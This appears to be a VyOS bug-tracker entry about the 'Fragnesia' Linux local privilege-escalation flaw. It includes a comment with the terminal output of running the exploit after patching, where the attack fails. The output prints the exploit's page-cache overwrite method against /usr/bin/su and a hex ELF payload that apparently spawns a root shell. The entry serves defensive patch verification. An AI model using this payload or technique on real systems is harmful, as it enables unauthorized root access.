Fragnesia (https://github.com/v12-security/pocs/tree/main/fragnesia) is a new LPE vulnerability related to "Dirty Frag" but not identical to it, that needs a separate fix.
Linux 6.6.138 that is now in our images is vulnerable and needs patching.
Description
Description
Details
Details
- Version
- -
- Is it a breaking change?
- Perfectly compatible
- Issue type
- Security vulnerability
Event Timeline
Comment Actions
After the patch:
vyos@vyos:~$ /tmp/exp [*] uid=1002 euid=1002 gid=100 egid=100 [*] mode=xfrm_espintcp_pagecache_replace collateral=after [*] target=/usr/bin/su size=72000 outer_write_open_denied=1 errno=13 (Permission denied) userns_setup: outer_uid=1002 outer_gid=100 ns_uid=0 ns_gid=0 netns_setup=1 loopback_up=1 xfrm_espintcp_state_add=1 namespace_setup_complete=1 userns_root_mapped_to_outer_user_write_open_denied=1 errno=13 (Permission denied) [*] timing: rx_pre_ulp=30000us tx_pre_splice=1000us rx_post_ulp=30000us [*] range: offset=0x0 len=192 last=0xbf enc_len=4080 splice_len=4096 [*] union: transformed=0x0-0x10ae collateral_after=0xc0-0x10ae [*] payload=7f454c4602010100000000000000000002003e0001000000780040000000000040000000000000000000000000000000000000004000380001000000000000000100000005000000000000000000000000004000000000000000400000000000b800000000000000b800000000000000001000000000000031ff31f631c0b06a0f05b0690f05b0740f056a00488d0512000000504889e2488d3d1200000031f66a3b580f055445524d3d787465726d002f62696e2f7368000000000000000000 stream0_table_entries=256 [*] smashing 192 bytes into read-only page cache changed=0 skipped=16 remaining=176 0000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 0010 [03]00 3e 00 01 00 00 00 78 00 40 00 00 00 00 00 0020 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0030 00 00 00 00 40 00 38 00 01 00 00 00 00 00 00 00 0040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 0050 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 0060 b8 00 00 00 00 00 00 00 b8 00 00 00 00 00 00 00 0070 00 10 00 00 00 00 00 00 31 ff 31 f6 31 c0 b0 6a 0080 0f 05 b0 69 0f 05 b0 74 0f 05 6a 00 48 8d 05 12 0090 00 00 00 50 48 89 e2 48 8d 3d 12 00 00 00 31 f6 00a0 6a 3b 58 0f 05 54 45 52 4d 3d 78 74 65 72 6d 00 00b0 2f 62 69 6e 2f 73 68 00 00 00 00 00 00 00 00 00 [====----------------------------------------------] 16/192 (8%) ──────────────────────────────────────────────────────────── [-] [1/192] +0000 already=7f skip [-] [2/192] +0001 already=45 skip [-] [3/192] +0002 already=4c skip [-] [4/192] +0003 already=46 skip [-] [5/192] +0004 already=02 skip [-] [6/192] +0005 already=01 skip [-] [7/192] +0006 already=01 skip [-] [8/192] +0007 already=00 skip [-] [9/192] +0008 already=00 skip [-] [10/192] +0009 already=00 skip [-] [11/192] +000a already=00 skip [-] [12/192] +000b already=00 skip [-] [13/192] +000c already=00 skip [-] [14/192] +000d already=00 skip [-] [15/192] +000e already=00 skip [-] [16/192] +000f already=00 skip byte_flip_nonce=27 stream_byte=01 byte_flip_packet_iv=cccccccc0000001b [*] [17/192] +0010 03 -> 02 xor=01 seq=2 nonce=27 firing espintcp splice... sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=16 file_off_next=4112 receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1 sender_status=0 receiver_status=0 [-] fixed behavior: byte unchanged at index=16 offset=16 : Authentication failure vyos@vyos:~$ id uid=1002(vyos) gid=100(users) groups=100(users),4(adm),6(disk),27(sudo),30(dip),102(vyattacfg),109(_kea),116(frrvty),117(frr),995(vpp)